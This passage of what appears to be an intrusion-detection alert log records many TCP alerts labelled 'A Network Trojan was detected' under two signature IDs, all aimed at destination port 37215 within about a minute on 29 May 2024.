                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416078
                SID:2835222
                Source Port:60712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.079169
                SID:2829579
                Source Port:40968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072582
                SID:2829579
                Source Port:49670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287621
                SID:2835222
                Source Port:34002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523934
                SID:2835222
                Source Port:50316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517284
                SID:2835222
                Source Port:40480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782333
                SID:2835222
                Source Port:60404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421086
                SID:2835222
                Source Port:40684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.827462
                SID:2835222
                Source Port:33948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443171
                SID:2829579
                Source Port:33658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164938
                SID:2829579
                Source Port:32802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166246
                SID:2829579
                Source Port:59742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804217
                SID:2835222
                Source Port:53168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618540
                SID:2835222
                Source Port:57302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721709
                SID:2829579
                Source Port:56076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231339
                SID:2829579
                Source Port:59754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032513
                SID:2829579
                Source Port:52158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.975130
                SID:2835222
                Source Port:38452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001128
                SID:2829579
                Source Port:51036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.077020
                SID:2835222
                Source Port:45336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897426
                SID:2829579
                Source Port:59392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856366
                SID:2829579
                Source Port:38066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434996
                SID:2829579
                Source Port:36862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731790
                SID:2835222
                Source Port:48168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.373863
                SID:2835222
                Source Port:51096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666365
                SID:2835222
                Source Port:39106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136061
                SID:2835222
                Source Port:57328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141051
                SID:2835222
                Source Port:43968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071726
                SID:2829579
                Source Port:34924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267607
                SID:2835222
                Source Port:39672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928061
                SID:2835222
                Source Port:35366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385281
                SID:2829579
                Source Port:51688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175390
                SID:2829579
                Source Port:36466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670963
                SID:2829579
                Source Port:51416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990011
                SID:2829579
                Source Port:58620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519268
                SID:2835222
                Source Port:51390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798070
                SID:2835222
                Source Port:47844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911880
                SID:2835222
                Source Port:52330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466206
                SID:2829579
                Source Port:49120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786195
                SID:2835222
                Source Port:56690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023083
                SID:2829579
                Source Port:47712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665956
                SID:2835222
                Source Port:33754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315750
                SID:2835222
                Source Port:59558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336510
                SID:2835222
                Source Port:37422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519044
                SID:2835222
                Source Port:56332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663827
                SID:2835222
                Source Port:36414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265814
                SID:2829579
                Source Port:33960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617773
                SID:2829579
                Source Port:35732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967499
                SID:2829579
                Source Port:54498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179582
                SID:2829579
                Source Port:38880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416103
                SID:2829579
                Source Port:37804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257329
                SID:2835222
                Source Port:50120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716946
                SID:2835222
                Source Port:58170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899167
                SID:2835222
                Source Port:51928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659836
                SID:2829579
                Source Port:39734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316587
                SID:2829579
                Source Port:54422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628332
                SID:2835222
                Source Port:57906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654709
                SID:2829579
                Source Port:58138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840796
                SID:2829579
                Source Port:54784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228413
                SID:2835222
                Source Port:45992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.970004
                SID:2835222
                Source Port:38232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653813
                SID:2829579
                Source Port:54430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.727819
                SID:2835222
                Source Port:50014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330655
                SID:2829579
                Source Port:55694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968466
                SID:2829579
                Source Port:58066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655789
                SID:2835222
                Source Port:33154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179438
                SID:2835222
                Source Port:56248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510940
                SID:2829579
                Source Port:46016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561036
                SID:2835222
                Source Port:47402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782370
                SID:2835222
                Source Port:53224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959404
                SID:2829579
                Source Port:33976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722079
                SID:2829579
                Source Port:55322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269121
                SID:2829579
                Source Port:40970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810821
                SID:2835222
                Source Port:58666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436241
                SID:2835222
                Source Port:41778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227537
                SID:2835222
                Source Port:51670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022254
                SID:2829579
                Source Port:56088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226946
                SID:2829579
                Source Port:56580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.844315
                SID:2829579
                Source Port:59954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163689
                SID:2835222
                Source Port:39584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.786723
                SID:2835222
                Source Port:55328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624478
                SID:2829579
                Source Port:42290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786735
                SID:2835222
                Source Port:56574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762998
                SID:2829579
                Source Port:43064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920435
                SID:2829579
                Source Port:41256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836034
                SID:2829579
                Source Port:52230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009586
                SID:2835222
                Source Port:38544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208019
                SID:2835222
                Source Port:56722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.035601
                SID:2829579
                Source Port:46392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786865
                SID:2829579
                Source Port:52258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837163
                SID:2829579
                Source Port:40926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533805
                SID:2829579
                Source Port:41714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824220
                SID:2835222
                Source Port:59670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735155
                SID:2835222
                Source Port:49990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.930550
                SID:2835222
                Source Port:45802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520764
                SID:2835222
                Source Port:34466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.899605
                SID:2829579
                Source Port:44622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438610
                SID:2835222
                Source Port:48342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.543984
                SID:2835222
                Source Port:59218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210646
                SID:2829579
                Source Port:59194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897038
                SID:2835222
                Source Port:43292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465943
                SID:2835222
                Source Port:60596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870070
                SID:2829579
                Source Port:50524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226579
                SID:2829579
                Source Port:34798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572936
                SID:2829579
                Source Port:42412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164747
                SID:2829579
                Source Port:39860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141949
                SID:2829579
                Source Port:50254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154944
                SID:2835222
                Source Port:51200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526167
                SID:2829579
                Source Port:51092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015750
                SID:2829579
                Source Port:41212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387250
                SID:2835222
                Source Port:49200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154982
                SID:2829579
                Source Port:35528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221229
                SID:2835222
                Source Port:49698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022358
                SID:2829579
                Source Port:43230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509210
                SID:2835222
                Source Port:40044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032956
                SID:2829579
                Source Port:48422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735789
                SID:2835222
                Source Port:55750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869676
                SID:2829579
                Source Port:59432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687336
                SID:2835222
                Source Port:49938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285556
                SID:2829579
                Source Port:46634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765135
                SID:2835222
                Source Port:56012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929800
                SID:2835222
                Source Port:48624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872496
                SID:2835222
                Source Port:47646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.365938
                SID:2829579
                Source Port:59312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165057
                SID:2835222
                Source Port:53674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857020
                SID:2829579
                Source Port:59308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243512
                SID:2835222
                Source Port:57512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665545
                SID:2829579
                Source Port:58656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970471
                SID:2829579
                Source Port:51584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681927
                SID:2835222
                Source Port:38992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281780
                SID:2835222
                Source Port:59240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.798251
                SID:2829579
                Source Port:44728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535265
                SID:2835222
                Source Port:59768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660322
                SID:2829579
                Source Port:56172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667006
                SID:2829579
                Source Port:48916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842094
                SID:2829579
                Source Port:55670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010770
                SID:2835222
                Source Port:59098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811038
                SID:2835222
                Source Port:50454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390372
                SID:2829579
                Source Port:50770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666051
                SID:2829579
                Source Port:45264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.689025
                SID:2835222
                Source Port:45992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223067
                SID:2829579
                Source Port:57356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113017
                SID:2829579
                Source Port:48268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628461
                SID:2829579
                Source Port:34116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782155
                SID:2829579
                Source Port:36424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421186
                SID:2835222
                Source Port:36638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869694
                SID:2829579
                Source Port:34826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574313
                SID:2835222
                Source Port:43908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559026
                SID:2829579
                Source Port:53990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718482
                SID:2835222
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919471
                SID:2829579
                Source Port:56128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887886
                SID:2835222
                Source Port:55814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629771
                SID:2835222
                Source Port:49236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.787115
                SID:2829579
                Source Port:34708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.843151
                SID:2835222
                Source Port:60360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915582
                SID:2829579
                Source Port:53138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128650
                SID:2829579
                Source Port:52312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533231
                SID:2829579
                Source Port:40560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267538
                SID:2835222
                Source Port:57526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164721
                SID:2835222
                Source Port:34612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225702
                SID:2829579
                Source Port:57396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890037
                SID:2829579
                Source Port:35980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228408
                SID:2829579
                Source Port:38990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898356
                SID:2829579
                Source Port:51576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521720
                SID:2829579
                Source Port:53766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.131692
                SID:2829579
                Source Port:41532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563589
                SID:2835222
                Source Port:33232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716192
                SID:2829579
                Source Port:58996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839657
                SID:2835222
                Source Port:56626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.567421
                SID:2835222
                Source Port:51298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178726
                SID:2835222
                Source Port:36362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506218
                SID:2835222
                Source Port:35466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618563
                SID:2835222
                Source Port:52294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845457
                SID:2829579
                Source Port:59628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.026287
                SID:2835222
                Source Port:48152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654121
                SID:2835222
                Source Port:56362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170023
                SID:2829579
                Source Port:59210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.822843
                SID:2835222
                Source Port:44024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.622934
                SID:2835222
                Source Port:60608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928296
                SID:2835222
                Source Port:39548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.373987
                SID:2835222
                Source Port:53158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422404
                SID:2829579
                Source Port:35288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429619
                SID:2829579
                Source Port:53000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163982
                SID:2835222
                Source Port:52816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329628
                SID:2829579
                Source Port:42318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218232
                SID:2829579
                Source Port:51272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507364
                SID:2829579
                Source Port:56204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.413642
                SID:2835222
                Source Port:56028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010473
                SID:2829579
                Source Port:58744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180378
                SID:2835222
                Source Port:55592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.109075
                SID:2829579
                Source Port:44368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470046
                SID:2829579
                Source Port:35924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417849
                SID:2835222
                Source Port:53366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257189
                SID:2835222
                Source Port:48686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910352
                SID:2829579
                Source Port:43910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964109
                SID:2829579
                Source Port:58678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140696
                SID:2835222
                Source Port:54842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
